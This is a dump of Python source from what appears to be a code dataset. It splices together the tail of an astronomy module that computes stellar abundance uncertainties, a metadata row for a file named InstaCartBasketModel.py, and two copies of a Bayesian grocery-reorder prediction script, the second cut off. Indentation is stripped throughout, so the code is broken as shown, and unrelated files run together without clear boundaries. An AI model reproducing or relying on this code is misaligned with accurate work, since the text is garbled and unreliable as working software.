delta = struct2array(t["e_Teff","e_logg","e_vt","e_MH"].as_array())
ex = t["e_stat"]
for i in range(35):
sigma_tilde = np.diag(s**2 + ex**2) + (delta.dot(rhomat.dot(delta.T)))
sigma_tilde_inv = np.linalg.inv(sigma_tilde)
w = np.sum(sigma_tilde_inv, axis=1)
xhat = np.sum(w*t["logeps"])/np.sum(w)
dx = t["logeps"] - xhat
def func(s):
return np.sum(dx**2 / (ex**2 + s**2)**2) - np.sum(1/(ex**2 + s**2))
if func(0) < func(s_max):
s = 0
break
s = optimize.brentq(func, 0, s_max, xtol=.001)
if np.abs(s_old - s) < 0.01:
break
s_old = s
else:
print(species,"s did not converge!")
print("Final in {} iter: {:.1f} {:.3f}".format(i+1, species, s))
tab["e_sys"][ix] = s
tab["e_tot"][ix] = np.sqrt(s**2 + ex**2)
sigma_tilde = np.diag(tab["e_tot"][ix]**2) + (delta.dot(rhomat.dot(delta.T)))
sigma_tilde_inv = np.linalg.inv(sigma_tilde)
w = np.sum(sigma_tilde_inv, axis=1)
wb = np.sum(sigma_tilde_inv, axis=0)
assert np.allclose(w,wb,rtol=1e-6), "Problem in species {:.1f}, Nline={}, e_sys={:.2f}".format(species, len(t), s)
tab["weight"][ix] = w
for col in tab.colnames:
if col in ["index", "wavelength", "species", "loggf", "star"]: continue
tab[col].format = ".3f"
return tab
def process_session_uncertainties_covariance(summary_tab, rhomat):
## Add in [X/Fe]
# cov_XY = Cov(X,Y). Diagonal entries are Var(X). The matrix is symmetric.
delta_XY = struct2array(np.array(summary_tab["e_Teff_w","e_logg_w","e_vt_w","e_MH_w"]))
cov_XY = delta_XY.dot(rhomat.dot(delta_XY.T))
assert np.all(np.abs(cov_XY - cov_XY.T) < 0.01**2), np.max(np.abs(np.abs(cov_XY - cov_XY.T)))
# Add statistical errors to the diagonal
#var_X = cov_XY[np.diag_indices_from(cov_XY)] + summary_tab["stderr_w"]**2
var_X = summary_tab["e_XH"]**2 #cov_XY[np.diag_indices_from(cov_XY)] +
return var_X, cov_XY
def process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY):
"""
Computes the following
Var([X/Fe]) = Var(X) + Var(Fe) - 2 Cov(X, Fe)
Does *not* compute covariances, but you can do that this way:
Cov([X/Fe], [Fe/H]) = Cov(X,Fe) - Cov(Fe, Fe)
"""
# [X/Fe] errors are the Fe1 and Fe2 parts of the covariance matrix
try:
ix1 = np.where(summary_tab["species"]==26.0)[0][0]
except IndexError:
print("No feh1: setting to nan")
feh1 = np.nan
exfe1 = np.nan
else:
feh1 = summary_tab["[X/H]"][ix1]
var_fe1 = var_X[ix1]
# Var(X/Fe1) = Var(X) + Var(Fe1) - 2*Cov(X,Fe1)
exfe1 = np.sqrt(var_X + var_fe1 - 2*cov_XY[ix1,:])
try:
ix2 = np.where(summary_tab["species"]==26.1)[0][0]
except IndexError:
print("No feh2: setting to feh1")
feh2 = feh1
try:
exfe2 = np.sqrt(var_X[ix1])
except UnboundLocalError: # no ix1 either
exfe2 = np.nan
else:
feh2 = summary_tab["[X/H]"][ix2]
var_fe2 = var_X[ix2]
# Var(X/Fe2) = Var(X) + Var(Fe2) - 2*Cov(X,Fe2)
exfe2 = np.sqrt(var_X + var_fe2 - 2*cov_XY[ix2,:])
return feh1, exfe1, feh2, exfe2
def process_session_uncertainties_abundancesummary(tab, rhomat):
"""
Take a table of lines and turn them into standard abundance table
"""
from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
from .photospheres.abundances import asplund_2009 as solar_composition
unique_species = np.unique(tab["species"])
cols = ["species","elem","N",
"logeps","sigma","stderr",
"logeps_w","sigma_w","stderr_w",
"e_Teff","e_logg","e_vt","e_MH","e_sys",
"e_Teff_w","e_logg_w","e_vt_w","e_MH_w","e_sys_w",
"[X/H]","e_XH","s_X"]
data = OrderedDict(zip(cols, [[] for col in cols]))
for species in unique_species:
ttab = tab[tab["species"]==species]
elem = species_to_element(species)
N = len(ttab)
logeps = np.mean(ttab["logeps"])
stdev = np.std(ttab["logeps"])
stderr = stdev/np.sqrt(N)
w = ttab["weight"]
finite = np.isfinite(w)
if finite.sum() != N:
print("WARNING: species {:.1f} N={} != finite weights {}".format(species, N, finite.sum()))
x = ttab["logeps"]
logeps_w = np.sum(w*x)/np.sum(w)
stdev_w = np.sqrt(np.sum(w*(x-logeps_w)**2)/np.sum(w))
stderr_w = np.sqrt(1/np.sum(w))
sperrs = []
sperrs_w = []
for spcol in ["Teff","logg","vt","MH"]:
x_new = x + ttab["e_"+spcol]
e_sp = np.mean(x_new) - logeps
sperrs.append(e_sp)
#e_sp_w = np.sum(w*x_new)/np.sum(w) - logeps_w
e_sp_w = np.sum(w*ttab["e_"+spcol])/np.sum(w)
sperrs_w.append(e_sp_w)
sperrs = np.array(sperrs)
sperrs_w = np.array(sperrs_w)
sperrtot = np.sqrt(sperrs.T.dot(rhomat.dot(sperrs)))
sperrtot_w = np.sqrt(sperrs_w.T.dot(rhomat.dot(sperrs_w)))
XH = logeps_w - solar_composition(species)
#e_XH = np.sqrt(stderr_w**2 + sperrtot_w**2)
e_XH = stderr_w
s_X = ttab["e_sys"][0]
assert np.allclose(ttab["e_sys"], s_X), s_X
input_data = [species, elem, N,
logeps, stdev, stderr,
logeps_w, stdev_w, stderr_w,
sperrs[0], sperrs[1], sperrs[2], sperrs[3], sperrtot,
sperrs_w[0], sperrs_w[1], sperrs_w[2], sperrs_w[3], sperrtot_w,
XH, e_XH, s_X
]
assert len(cols) == len(input_data)
for col, x in zip(cols, input_data):
data[col].append(x)
summary_tab = astropy.table.Table(data)
## Add in [X/Fe]
var_X, cov_XY = process_session_uncertainties_covariance(summary_tab, rhomat)
feh1, efe1, feh2, efe2 = process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY)
if len(summary_tab["[X/H]"]) > 0:
summary_tab["[X/Fe1]"] = summary_tab["[X/H]"] - feh1
summary_tab["e_XFe1"] = efe1
summary_tab["[X/Fe2]"] = summary_tab["[X/H]"] - feh2
summary_tab["e_XFe2"] = efe2
ixion = np.array([x - int(x) > .01 for x in summary_tab["species"]])
summary_tab["[X/Fe]"] = summary_tab["[X/Fe1]"]
summary_tab["e_XFe"] = summary_tab["e_XFe1"]
summary_tab["[X/Fe]"][ixion] = summary_tab["[X/Fe2]"][ixion]
summary_tab["e_XFe"][ixion] = summary_tab["e_XFe2"][ixion]
for col in summary_tab.colnames:
if col=="N" or col=="species" or col=="elem": continue
summary_tab[col].format = ".3f"
else:
for col in ["[X/Fe]","[X/Fe1]","[X/Fe2]",
"e_XFe","e_XFe1","e_XFe2"]:
summary_tab.add_column(astropy.table.Column(np.zeros(0),col))
#summary_tab[col] = np.nan #.add_column(col)
return summary_tab
def process_session_uncertainties_limits(session, tab, summary_tab, rhomat):
from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
from .photospheres.abundances import asplund_2009 as solar_composition
## Add in upper limits to line data
cols = ["index","wavelength","species","expot","loggf",
"logeps","e_stat","eqw","e_eqw","fwhm",
"e_Teff","e_logg","e_vt","e_MH","e_sys",
"e_tot","weight"]
var_X, cov_XY = process_session_uncertainties_covariance(summary_tab, rhomat)
feh1, efe1, feh2, efe2 = process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY)
assert len(cols)==len(tab.colnames)
data = OrderedDict(zip(cols, [[] for col in cols]))
for i, model in enumerate(session.spectral_models):
if not model.is_upper_limit: continue
if not model.is_acceptable: continue
wavelength = model.wavelength
species = np.ravel(model.species)[0]
expot = model.expot or np.nan
loggf = model.loggf or np.nan
try:
logeps = model.abundances[0]
except:
logeps = np.nan
input_data = [i, wavelength, species, expot, loggf,
logeps, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan]
for col, x in zip(cols, input_data):
data[col].append(x)
tab_ul = astropy.table.Table(data)
tab_ul["logeps"].format = ".3f"
tab = astropy.table.vstack([tab, tab_ul])
## Add in upper limits to summary table
ul_species = np.unique(tab_ul["species"])
cols = ["species","elem","N",
"logeps","sigma","stderr",
"logeps_w","sigma_w","stderr_w",
"e_Teff","e_logg","e_vt","e_MH","e_sys",
"e_Teff_w","e_logg_w","e_vt_w","e_MH_w","e_sys_w",
"[X/H]","e_XH","s_X"] + ["[X/Fe1]","e_XFe1","[X/Fe2]","e_XFe2","[X/Fe]","e_XFe"]
assert len(cols)==len(summary_tab.colnames)
data = OrderedDict(zip(cols, [[] for col in cols]))
for species in ul_species:
if species in summary_tab["species"]: continue
ttab_ul = tab_ul[tab_ul["species"]==species]
elem = species_to_element(species)
N = len(ttab_ul)
limit_logeps = np.min(ttab_ul["logeps"])
limit_XH = limit_logeps - solar_composition(species)
limit_XFe1 = limit_XH - feh1
limit_XFe2 = limit_XH - feh2
limit_XFe = limit_XFe2 if (species - int(species) > .01) else limit_XFe1
input_data = [species, elem, N,
limit_logeps, np.nan, np.nan,
limit_logeps, np.nan, np.nan,
np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan, np.nan, np.nan, np.nan,
limit_XH, np.nan, np.nan, limit_XFe1, np.nan, limit_XFe2, np.nan,
limit_XFe, np.nan
]
for col, x in zip(cols, input_data):
data[col].append(x)
summary_tab_ul = astropy.table.Table(data)
if len(summary_tab_ul) > 0:
if len(summary_tab) > 0:
summary_tab = astropy.table.vstack([summary_tab, summary_tab_ul])
else:
summary_tab = summary_tab_ul
return tab, summary_tab
def process_session_uncertainties(session,
rho_Tg=0.0, rho_Tv=0.0, rho_TM=0.0, rho_gv=0.0, rho_gM=0.0, rho_vM=0.0):
"""
After you have run session.compute_all_abundance_uncertainties(),
this pulls out a big array of line data
and computes the final abundance table and errors
By default assumes no correlations in stellar parameters. If you specify rho_XY
it will include that correlated error.
(X,Y) in [T, g, v, M]
"""
## Correlation matrix. This is multiplied by the errors to get the covariance matrix.
# rho order = [T, g, v, M]
rhomat = _make_rhomat(rho_Tg, rho_Tv, rho_TM, rho_gv, rho_gM, rho_vM)
## Make line measurement table (no upper limits yet)
tab = process_session_uncertainties_lines(session, rhomat)
## Summarize measurements
summary_tab = process_session_uncertainties_abundancesummary(tab, rhomat)
## Add upper limits
tab, summary_tab = process_session_uncertainties_limits(session, tab, summary_tab, rhomat)
return tab, summary_tab
def get_synth_eqw(model, window=1.0, wavelength=None,
get_spec=False):
"""
Calculate the equivalent width associated with the synthetic line.
This is done by synthesizing the line in absence of any other elements,
then integrating the synthetic spectrum in a window around the central wavelength.
The user can specify the size of the window (default +/-1A)
and the central wavelength (default None -> model.wavelength)
"""
from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
assert isinstance(model, SpectralSynthesisModel)
assert len(model.elements)==1, model.elements
abundances = model.metadata["rt_abundances"].copy()
for key in abundances:
if key != model.elements[0]: abundances[key] = -9.0
abundances[model.elements[0]] = model.metadata["fitted_result"][0].values()[0]
print(abundances)
synth_dispersion, intensities, meta = model.session.rt.synthesize(
model.session.stellar_photosphere, model.transitions,
abundances,
isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
if wavelength is None: wavelength = model.wavelength
ii = (synth_dispersion > wavelength - window) & (synth_dispersion < wavelength + window)
# integrate with the trapezoid rule, get milliangstroms
eqw = 1000.*integrate.trapz(1.0-intensities[ii], synth_dispersion[ii])
# integrate everything with the trapezoid rule, get milliangstroms
eqw_all = 1000.*integrate.trapz(1.0-intensities, synth_dispersion)
for key in abundances:
abundances[key] = -9.0
blank_dispersion, blank_flux, blank_meta = model.session.rt.synthesize(
model.session.stellar_photosphere, model.transitions,
abundances,
isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
blank_eqw = 1000.*integrate.trapz(1.0-blank_flux[ii], blank_dispersion[ii])
# integrate everything with the trapezoid rule, get milliangstroms
blank_eqw_all = 1000.*integrate.trapz(1.0-blank_flux, blank_dispersion)
if get_spec:
return eqw, eqw_all, blank_eqw, blank_eqw_all, synth_dispersion, intensities
return eqw, eqw_all, blank_eqw, blank_eqw_all
| 9,557 | 0 | 307 |
b29384389eba26985454f182e28e8d39d6a7b891 | 11,406 | py | Python | InstaCartBasketModel.py | ratdee/god | 3349447ca3a418e94cc53a926c09f091e1720ce6 | [
"MIT"
] | null | null | null | InstaCartBasketModel.py | ratdee/god | 3349447ca3a418e94cc53a926c09f091e1720ce6 | [
"MIT"
] | null | null | null | InstaCartBasketModel.py | ratdee/god | 3349447ca3a418e94cc53a926c09f091e1720ce6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat May 18 16:04:58 2019
@author: Admin
"""
# -*- coding: utf-8 -*-
"""
Created on Mon July 8 17:30:45 2019
@author: Admin
"""
import pandas as pd
import numpy as np
# reading data
order_products_prior_df = pd.read_csv('order_products_prior.csv', dtype={
'order_id': np.int32,
'product_id': np.int32,
'add_to_cart_order': np.int16,
'reordered': np.int8})
print('Loaded prior orders')
print('shape of Ordersproduct priors',order_products_prior_df.shape)
order_products_prior_df=order_products_prior_df.loc[order_products_prior_df['order_id']<=2110720]
print('Loading orders')
orders_df = pd.read_csv( 'orders.csv', dtype={
'order_id': np.int32,
'user_id': np.int32,
'eval_set': 'category',
'order_number': np.int16,
'order_dow': np.int8,
'order_hour_of_day': np.int8,
'days_since_prior_order': np.float32})
orders_df=orders_df.loc[orders_df['order_id']<=2110720]
print(orders_df.shape)
print('Loading aisles info')
aisles = pd.read_csv('products.csv', engine='c',
usecols = ['product_id','aisle_id'],
dtype={'product_id': np.int32, 'aisle_id': np.int32})
pd.set_option('display.float_format', lambda x: '%.3f' % x)
print("\n Checking the loaded CSVs")
print("Prior orders:", order_products_prior_df.shape)
print("Orders", orders_df.shape)
print("Aisles:", aisles.shape)
test = orders_df[orders_df['eval_set'] == 'test' ]
user_ids = test['user_id'].values
orders_df = orders_df[orders_df['user_id'].isin(user_ids)]
print('test shape', test.shape)
print(orders_df.shape)
prior = pd.DataFrame(order_products_prior_df.groupby('product_id')['reordered'] \
.agg([('number_of_orders',len),('sum_of_reorders','sum')]))
print(prior.head())
prior['prior_p'] = (prior['sum_of_reorders']+1)/(prior['number_of_orders']+2) # Informed Prior
print(prior.head())
print('Here is The Prior: our first guess of how probable it is that a product be reordered once it has been ordered.')
#print(prior.head())
# merge everything into one dataframe and save any memory space
combined_features = pd.DataFrame()
combined_features = pd.merge(order_products_prior_df, orders_df, on='order_id', how='right')
# slim down comb -
combined_features.drop(['eval_set','order_dow','order_hour_of_day'], axis=1, inplace=True)
del order_products_prior_df
del orders_df
combined_features = pd.merge(combined_features, aisles, on ='product_id', how = 'left')
del aisles
prior.reset_index(inplace = True)
combined_features = pd.merge(combined_features, prior, on ='product_id', how = 'left')
del prior
#print(combined_features.head())
recount = pd.DataFrame()
recount['reorder_c'] = combined_features.groupby(combined_features.order_id)['reordered'].sum().fillna(0)
#print(recount.head(20))
print('classification')
bins = [-0.1, 0, 2,4,6,8,11,14,19,71]
cat = ['None','<=2','<=4','<=6','<=8','<=11','<=14','<=19','>19']
recount['reorder_b'] = pd.cut(recount['reorder_c'], bins, labels = cat)
recount.reset_index(inplace = True)
#print(recount.head(20))
#We discretize reorder count into categories, 9 buckets, being sure to include 0 as bucket. These bins maximize mutual information with ['reordered'].
combined_features = pd.merge(combined_features, recount, how = 'left', on = 'order_id')
del recount
#print(combined_features.head(50))
bins = [0,2,3,5,7,9,12,17,80]
cat = ['<=2','<=3','<=5','<=7','<=9','<=12','<=17','>17']
combined_features['atco1'] = pd.cut(combined_features['add_to_cart_order'], bins, labels = cat)
del combined_features['add_to_cart_order']
#print(combined_features.head(50))
combined_features.to_csv('combined_features.csv', index=False)
atco_fac = pd.DataFrame()
atco_fac = combined_features.groupby(['reordered', 'atco1'])['atco1'].agg(np.count_nonzero).unstack('atco1')
#print(atco_fac.head(10))
tot = np.sum(atco_fac,axis=1)
print(tot.head(10))
atco_fac = atco_fac.iloc[:,:].div(tot, axis=0)
#print(atco_fac.head(10))
atco_fac = atco_fac.stack('atco1')
#print(atco_fac.head(20))
atco_fac = pd.DataFrame(atco_fac)
atco_fac.reset_index(inplace = True)
atco_fac.rename(columns = {0:'atco_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, atco_fac, how='left', on=('reordered', 'atco1'))
combined_features.head(50)
aisle_fac = pd.DataFrame()
aisle_fac = combined_features.groupby(['reordered', 'atco1', 'aisle_id'])['aisle_id']\
.agg(np.count_nonzero).unstack('aisle_id')
print(aisle_fac.head(30))
#print(aisle_fac.head(30))
tot = np.sum(aisle_fac,axis=1)
print(tot.head(20))
aisle_fac = aisle_fac.iloc[:,:].div(tot, axis=0)
print(aisle_fac.head(20))
print('Stacking Aisle Fac')
aisle_fac = aisle_fac.stack('aisle_id')
print(aisle_fac.head(20))
aisle_fac = pd.DataFrame(aisle_fac)
aisle_fac.reset_index(inplace = True)
aisle_fac.rename(columns = {0:'aisle_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, aisle_fac, how = 'left', on = ('aisle_id','reordered','atco1'))
recount_fac = pd.DataFrame()
recount_fac = combined_features.groupby(['reordered', 'atco1', 'reorder_b'])['reorder_b']\
.agg(np.count_nonzero).unstack('reorder_b')
print(recount_fac.head(20))
tot = pd.DataFrame()
tot = np.sum(recount_fac,axis=1)
print(tot.head(20))
recount_fac = recount_fac.iloc[:,:].div(tot, axis=0)
print(recount_fac.head(20))
#print('after stacking***************************')
recount_fac.stack('reorder_b')
print(recount_fac.head(20))
recount_fac = pd.DataFrame(recount_fac.unstack('reordered').unstack('atco1')).reset_index()
#print(recount_fac.head(20))
recount_fac.rename(columns = {0:'recount_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, recount_fac, how = 'left', on = ('reorder_b', 'reordered', 'atco1'))
print(recount_fac.head(50))
print(combined_features.head(20))
p = pd.DataFrame()
p = (combined_features.loc[:,'atco_fac_p'] * combined_features.loc[:,'aisle_fac_p'] * combined_features.loc[:,'recount_fac_p'])
p.reset_index()
combined_features['p'] = p
print(combined_features.head(30))
comb0 = pd.DataFrame()
print(combined_features.shape)
comb0 = combined_features[combined_features['reordered']==0]
print(comb0.shape)
comb0.loc[:,'first_order'] = comb0['order_number']
# now every product that was ordered has a posterior in usr.
comb0.loc[:,'beta'] = 1
comb0.loc[:,'bf'] = (comb0.loc[:,'prior_p'] * comb0.loc[:,'p']/(1 - comb0.loc[:,'p'])) # bf1
# Small 'slight of hand' here. comb0.bf is really the first posterior and second prior.
#comb0.to_csv('comb0.csv', index=False)
# Calculate beta and BF1 for the reordered products
comb1 = pd.DataFrame()
comb1 = combined_features[combined_features['reordered']==1]
comb1.loc[:,'beta'] = (1 - .05*comb1.loc[:,'days_since_prior_order']/30)
comb1.loc[:,'bf'] = (1 - comb1.loc[:,'p'])/comb1.loc[:,'p'] # bf0
comb_last = pd.DataFrame()
comb_last = pd.concat([comb0, comb1], axis=0).reset_index(drop=True)
comb_last = comb_last[['reordered', 'user_id', 'order_id', 'product_id','reorder_c','order_number',
'bf','beta','atco_fac_p', 'aisle_fac_p', 'recount_fac_p']]
comb_last = comb_last.sort_values((['user_id', 'order_number', 'bf']))
pd.set_option('display.float_format', lambda x: '%.6f' % x)
comb_last.head()
first_order = pd.DataFrame()
first_order = comb_last[comb_last.reordered == 0]
first_order.rename(columns = {'order_number':'first_o'}, inplace = True)
first_order.to_csv('first_order_before_transform.csv', index=False)
first_order.loc[:,'last_o'] = comb_last.groupby(['user_id'])['order_number'].transform(max)
first_order.to_csv('first_order_transform.csv', index=False)
first_order = first_order[['user_id','product_id','first_o','last_o']]
comb_last = pd.merge(comb_last, first_order, on = ('user_id', 'product_id'), how = 'left')
comb_last.head()
comb_last.to_csv('comb_last.csv')
comb_last = pd.read_csv('comb_last.csv', index_col=0)
#comb_last.to_csv('comb_last.csv', index=False)
temp = pd.pivot_table(comb_last[(comb_last.user_id == 786
) & (comb_last.first_o == comb_last.order_number)],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number', dropna=False)
#print (temp.head(10))
temp = temp.fillna(method='pad', axis=1).fillna(1)
temp.head(10)
temp.to_csv('temp.csv')
#print(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
# values = 'bf', index = ['user_id', 'product_id'],
# columns = 'order_number').head(10))
temp.update(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number'))
print(temp.head(10))
#temp.to_csv('temp.csv')
import logging
logging.basicConfig(filename='bayes.log',level=logging.DEBUG)
logging.debug("Started Posterior calculations")
print("Started Posterior calculations")
pred = pd.DataFrame(columns=['user_id', 'product_id'])
pred['user_id'] = pred.user_id.astype(np.int32)
pred['product_id'] = pred.product_id.astype(np.int32)
for uid in comb_last.user_id.unique():
if uid % 1000 == 0:
print("Posterior calculated until user %d" % uid)
logging.debug("Posterior calculated until user %d" % uid)
# del comb_last_temp
comb_last_temp = pd.DataFrame()
comb_last_temp = comb_last[comb_last['user_id'] == uid].reset_index()
# del com
com = pd.DataFrame()
com = pd.pivot_table(comb_last_temp[comb_last_temp.first_o == comb_last_temp.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number', dropna=False)
com = com.fillna(method='pad', axis=1).fillna(1)
com.update(pd.pivot_table(comb_last_temp[comb_last_temp.first_o <= comb_last_temp.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number'))
com.reset_index(inplace=True)
com['posterior'] = com.product(axis=1)
pred = pred.append(com.sort_values(by=['posterior'], ascending=False).head(10) \
.groupby('user_id')['product_id'].apply(list).reset_index())
print("Posterior calculated for all users")
logging.debug("Posterior calculated for all users")
pred = pred.rename(columns={'product_id': 'products'})
print(pred.head())
pred.to_csv('Finalpredictions.csv', index=False)
pred = pred.merge(test, on='user_id', how='left')[['order_id', 'products']]
pred['products'] = pred['products'].apply(lambda x: [int(i) for i in x]) \
.astype(str).apply(lambda x: x.strip('[]').replace(',', ''))
print(pred.head())
pred.to_csv('Testpredictions.csv', index=False) | 31.421488 | 151 | 0.65299 | # -*- coding: utf-8 -*-
"""
Created on Sat May 18 16:04:58 2019
@author: Admin
"""
# -*- coding: utf-8 -*-
"""
Created on Mon July 8 17:30:45 2019
@author: Admin
"""
import pandas as pd
import numpy as np
# reading data
order_products_prior_df = pd.read_csv('order_products_prior.csv', dtype={
'order_id': np.int32,
'product_id': np.int32,
'add_to_cart_order': np.int16,
'reordered': np.int8})
print('Loaded prior orders')
print('shape of Ordersproduct priors',order_products_prior_df.shape)
order_products_prior_df=order_products_prior_df.loc[order_products_prior_df['order_id']<=2110720]
print('Loading orders')
orders_df = pd.read_csv( 'orders.csv', dtype={
'order_id': np.int32,
'user_id': np.int32,
'eval_set': 'category',
'order_number': np.int16,
'order_dow': np.int8,
'order_hour_of_day': np.int8,
'days_since_prior_order': np.float32})
orders_df=orders_df.loc[orders_df['order_id']<=2110720]
print(orders_df.shape)
print('Loading aisles info')
aisles = pd.read_csv('products.csv', engine='c',
usecols = ['product_id','aisle_id'],
dtype={'product_id': np.int32, 'aisle_id': np.int32})
pd.set_option('display.float_format', lambda x: '%.3f' % x)
print("\n Checking the loaded CSVs")
print("Prior orders:", order_products_prior_df.shape)
print("Orders", orders_df.shape)
print("Aisles:", aisles.shape)
test = orders_df[orders_df['eval_set'] == 'test' ]
user_ids = test['user_id'].values
orders_df = orders_df[orders_df['user_id'].isin(user_ids)]
print('test shape', test.shape)
print(orders_df.shape)
prior = pd.DataFrame(order_products_prior_df.groupby('product_id')['reordered'] \
.agg([('number_of_orders',len),('sum_of_reorders','sum')]))
print(prior.head())
prior['prior_p'] = (prior['sum_of_reorders']+1)/(prior['number_of_orders']+2) # Informed Prior
print(prior.head())
print('Here is The Prior: our first guess of how probable it is that a product be reordered once it has been ordered.')
#print(prior.head())
# merge everything into one dataframe and save any memory space
combined_features = pd.DataFrame()
combined_features = pd.merge(order_products_prior_df, orders_df, on='order_id', how='right')
# slim down comb -
combined_features.drop(['eval_set','order_dow','order_hour_of_day'], axis=1, inplace=True)
del order_products_prior_df
del orders_df
combined_features = pd.merge(combined_features, aisles, on ='product_id', how = 'left')
del aisles
prior.reset_index(inplace = True)
combined_features = pd.merge(combined_features, prior, on ='product_id', how = 'left')
del prior
#print(combined_features.head())
recount = pd.DataFrame()
recount['reorder_c'] = combined_features.groupby(combined_features.order_id)['reordered'].sum().fillna(0)
#print(recount.head(20))
print('classification')
bins = [-0.1, 0, 2,4,6,8,11,14,19,71]
cat = ['None','<=2','<=4','<=6','<=8','<=11','<=14','<=19','>19']
recount['reorder_b'] = pd.cut(recount['reorder_c'], bins, labels = cat)
recount.reset_index(inplace = True)
#print(recount.head(20))
#We discretize reorder count into categories, 9 buckets, being sure to include 0 as bucket. These bins maximize mutual information with ['reordered'].
combined_features = pd.merge(combined_features, recount, how = 'left', on = 'order_id')
del recount
#print(combined_features.head(50))
bins = [0,2,3,5,7,9,12,17,80]
cat = ['<=2','<=3','<=5','<=7','<=9','<=12','<=17','>17']
combined_features['atco1'] = pd.cut(combined_features['add_to_cart_order'], bins, labels = cat)
del combined_features['add_to_cart_order']
#print(combined_features.head(50))
combined_features.to_csv('combined_features.csv', index=False)
atco_fac = pd.DataFrame()
atco_fac = combined_features.groupby(['reordered', 'atco1'])['atco1'].agg(np.count_nonzero).unstack('atco1')
#print(atco_fac.head(10))
tot = np.sum(atco_fac,axis=1)
print(tot.head(10))
atco_fac = atco_fac.iloc[:,:].div(tot, axis=0)
#print(atco_fac.head(10))
atco_fac = atco_fac.stack('atco1')
#print(atco_fac.head(20))
atco_fac = pd.DataFrame(atco_fac)
atco_fac.reset_index(inplace = True)
atco_fac.rename(columns = {0:'atco_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, atco_fac, how='left', on=('reordered', 'atco1'))
combined_features.head(50)
aisle_fac = pd.DataFrame()
aisle_fac = combined_features.groupby(['reordered', 'atco1', 'aisle_id'])['aisle_id']\
.agg(np.count_nonzero).unstack('aisle_id')
print(aisle_fac.head(30))
#print(aisle_fac.head(30))
tot = np.sum(aisle_fac,axis=1)
print(tot.head(20))
aisle_fac = aisle_fac.iloc[:,:].div(tot, axis=0)
print(aisle_fac.head(20))
print('Stacking Aisle Fac')
aisle_fac = aisle_fac.stack('aisle_id')
print(aisle_fac.head(20))
aisle_fac = pd.DataFrame(aisle_fac)
aisle_fac.reset_index(inplace = True)
aisle_fac.rename(columns = {0:'aisle_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, aisle_fac, how = 'left', on = ('aisle_id','reordered','atco1'))
recount_fac = pd.DataFrame()
recount_fac = combined_features.groupby(['reordered', 'atco1', 'reorder_b'])['reorder_b']\
.agg(np.count_nonzero).unstack('reorder_b')
print(recount_fac.head(20))
tot = pd.DataFrame()
tot = np.sum(recount_fac,axis=1)
print(tot.head(20))
recount_fac = recount_fac.iloc[:,:].div(tot, axis=0)
print(recount_fac.head(20))
#print('after stacking***************************')
recount_fac.stack('reorder_b')
print(recount_fac.head(20))
recount_fac = pd.DataFrame(recount_fac.unstack('reordered').unstack('atco1')).reset_index()
#print(recount_fac.head(20))
recount_fac.rename(columns = {0:'recount_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, recount_fac, how = 'left', on = ('reorder_b', 'reordered', 'atco1'))
print(recount_fac.head(50))
print(combined_features.head(20))
p = pd.DataFrame()
p = (combined_features.loc[:,'atco_fac_p'] * combined_features.loc[:,'aisle_fac_p'] * combined_features.loc[:,'recount_fac_p'])
p.reset_index()
combined_features['p'] = p
print(combined_features.head(30))
comb0 = pd.DataFrame()
print(combined_features.shape)
comb0 = combined_features[combined_features['reordered']==0]
print(comb0.shape)
comb0.loc[:,'first_order'] = comb0['order_number']
# now every product that was ordered has a posterior in usr.
comb0.loc[:,'beta'] = 1
comb0.loc[:,'bf'] = (comb0.loc[:,'prior_p'] * comb0.loc[:,'p']/(1 - comb0.loc[:,'p'])) # bf1
# Small 'slight of hand' here. comb0.bf is really the first posterior and second prior.
#comb0.to_csv('comb0.csv', index=False)
# Calculate beta and BF1 for the reordered products
comb1 = pd.DataFrame()
comb1 = combined_features[combined_features['reordered']==1]
comb1.loc[:,'beta'] = (1 - .05*comb1.loc[:,'days_since_prior_order']/30)
comb1.loc[:,'bf'] = (1 - comb1.loc[:,'p'])/comb1.loc[:,'p'] # bf0
comb_last = pd.DataFrame()
comb_last = pd.concat([comb0, comb1], axis=0).reset_index(drop=True)
comb_last = comb_last[['reordered', 'user_id', 'order_id', 'product_id','reorder_c','order_number',
'bf','beta','atco_fac_p', 'aisle_fac_p', 'recount_fac_p']]
comb_last = comb_last.sort_values((['user_id', 'order_number', 'bf']))
pd.set_option('display.float_format', lambda x: '%.6f' % x)
comb_last.head()
first_order = pd.DataFrame()
first_order = comb_last[comb_last.reordered == 0]
first_order.rename(columns = {'order_number':'first_o'}, inplace = True)
first_order.to_csv('first_order_before_transform.csv', index=False)
first_order.loc[:,'last_o'] = comb_last.groupby(['user_id'])['order_number'].transform(max)
first_order.to_csv('first_order_transform.csv', index=False)
first_order = first_order[['user_id','product_id','first_o','last_o']]
comb_last = pd.merge(comb_last, first_order, on = ('user_id', 'product_id'), how = 'left')
comb_last.head()
comb_last.to_csv('comb_last.csv')
comb_last = pd.read_csv('comb_last.csv', index_col=0)
#comb_last.to_csv('comb_last.csv', index=False)
temp = pd.pivot_table(comb_last[(comb_last.user_id == 786
) & (comb_last.first_o == comb_last.order_number)],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number', dropna=False)
#print (temp.head(10))
temp = temp.fillna(method='pad', axis=1).fillna(1)
temp.head(10)
temp.to_csv('temp.csv')
